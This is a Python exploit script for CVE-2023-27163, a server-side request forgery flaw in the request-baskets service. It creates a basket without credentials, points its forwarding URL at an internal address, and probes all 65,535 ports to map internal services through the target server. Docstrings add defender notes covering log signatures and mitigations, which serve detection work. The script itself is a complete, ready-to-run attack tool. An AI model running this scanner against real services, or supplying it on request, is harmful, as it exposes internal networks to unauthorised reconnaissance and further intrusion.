CVE-2023-27163.py
import requests
import random
import string
import os
import argparse
def generate_random_basket_name(length=8):
    '''
    Return a random basket name of ``length`` characters.

    Characters are drawn from lowercase ASCII letters and digits. ``random``
    is not a CSPRNG; the value is used in this file as a URL path segment
    (a basket identifier), not as a secret.
    '''
    alphabet = string.ascii_lowercase + string.digits
    picked = random.choices(alphabet, k=length)
    return ''.join(picked)
def create_basket(target_url):
    '''
    Create a basket under a random name and return ``(token, basket_name)``.

    POSTs an empty form body to ``{target_url}/api/baskets/{name}`` and cuts
    the token out of the raw response text. No HTTP status check is made and
    no timeout is set; a response without a ``"token":"`` field raises
    ``IndexError`` from the split below.

    Defender note: the request carries a fixed Firefox/102.0 User-Agent and a
    literal ``Authorization: null`` header, both of which are stable strings
    to match on in access logs. That a token is expected back suggests the
    service accepts basket creation without prior credentials (inferred from
    this script, not confirmed here).
    '''
    name = generate_random_basket_name()
    endpoint = f'{target_url}/api/baskets/{name}'
    request_headers = {
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0',
        'Accept': '*/*',
        'Accept-Language': 'en-US,en;q=0.5',
        'Accept-Encoding': 'gzip, deflate',
        'Authorization': 'null',
        'X-Requested-With': 'XMLHttpRequest',
        'Origin': target_url,
        'Referer': f'{target_url}/web',
        'Connection': 'close'
    }
    reply = requests.post(endpoint, headers=request_headers, data={})

    # The body is treated as text, not parsed as JSON: take what follows the
    # '"token":"' marker up to the next double quote.
    after_marker = reply.text.split('"token":"')[1]
    token = after_marker.split('"')[0]

    # Recover the name from the URL's last path segment (same value as `name`).
    basket_name_extracted = endpoint.split('/')[-1]

    print("\n----------Creating a New Basket----------")
    print(f"\nGenerated Basket Name: {basket_name_extracted}")
    print(f"\nToken: {token}")
    return token, basket_name_extracted
def configure_basket(target_url, token, basket_name, port, internal_ip):
    '''
    Point the basket's forwarding target at ``http://{internal_ip}:{port}``.

    Sends a PUT with a JSON body to ``{target_url}/api/baskets/{basket_name}``,
    authorised with the basket token. The response is not inspected and
    nothing is returned.

    Defender note: ``forward_url`` is caller-controlled and, with
    ``proxy_response`` enabled, the service relays whatever it fetched back
    to the requester. This is the server-side request forgery condition the
    CVE in this file's name refers to (request-baskets). Service-side
    mitigations are to validate ``forward_url`` against loopback, private and
    link-local ranges after DNS resolution, and to restrict the server's
    outbound network access; repeated PUTs to one basket whose
    ``forward_url`` changes only in port are a usable log signature.
    '''
    endpoint = f'{target_url}/api/baskets/{basket_name}'
    request_headers = {
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0',
        'Accept': 'application/json, text/javascript, */*; q=0.01',
        'Accept-Language': 'en-US,en;q=0.5',
        'Accept-Encoding': 'gzip, deflate',
        'Content-Type': 'application/json',
        'Authorization': f'{token}',
        'X-Requested-With': 'XMLHttpRequest',
        'Origin': target_url,
        'Connection': 'close',
        'Referer': f'{target_url}/web/{basket_name}'
    }
    forward_target = f'http://{internal_ip}:{port}'
    settings = {
        "forward_url": forward_target,
        "proxy_response": True,
        "insecure_tls": False,
        "expand_path": False,
        "capacity": 200
    }
    # Fire-and-forget: the status of the reconfiguration is never checked.
    requests.put(endpoint, headers=request_headers, json=settings)
def port_scan(target_url, token, basket_name, port, internal_ip):
    '''
    Reconfigure the basket for one port, request it, and report the result.

    After ``configure_basket`` sets the forwarding target, a GET to
    ``{target_url}/{basket_name}`` makes the service perform the forward.
    The script prints ``http://{internal_ip}:{port}`` for every status code
    other than 502 and stays silent on 502; it therefore treats 502 as the
    only "nothing answered" signal, so any other error status is reported
    as a hit too. Returns ``None``.
    '''
    configure_basket(target_url, token, basket_name, port, internal_ip)
    probe = requests.get(f'{target_url}/{basket_name}')
    if probe.status_code == 502:
        return
    print(f'http://{internal_ip}:{port}')
def main():
    '''
    Parse the command line, create one basket, and walk ports 1-65535.

    ``--target`` is the base URL of the basket service (required);
    ``--internal-ip`` is the address placed in the forwarding URL and
    defaults to ``127.0.0.1``.

    Defender note: the loop is sequential and issues one PUT plus one GET
    per port against a single basket, i.e. 65535 ordered request pairs from
    one client. That volume and regularity is what rate limiting or alerting
    on the basket API would see.
    '''
    cli = argparse.ArgumentParser(
        description='CVE-2023-27163 - Internal Port Scanner'
    )
    cli.add_argument('-t', '--target', type=str, required=True,
                     help='Specify your target!')
    cli.add_argument('-i', '--internal-ip', type=str, default='127.0.0.1',
                     help='Specify internal IP')
    opts = cli.parse_args()

    base_url = opts.target
    inner_host = opts.internal_ip

    token, basket_name = create_basket(base_url)

    print("\n---------Performing Port Scanning---------")
    port = 1
    while port <= 65535:  # every TCP port number, 1 through 65535
        port_scan(base_url, token, basket_name, port, inner_host)
        port += 1
    print("Port Scanning is completed!")
# Run the scan only when executed as a script, not when imported.
if __name__ == "__main__":
    main()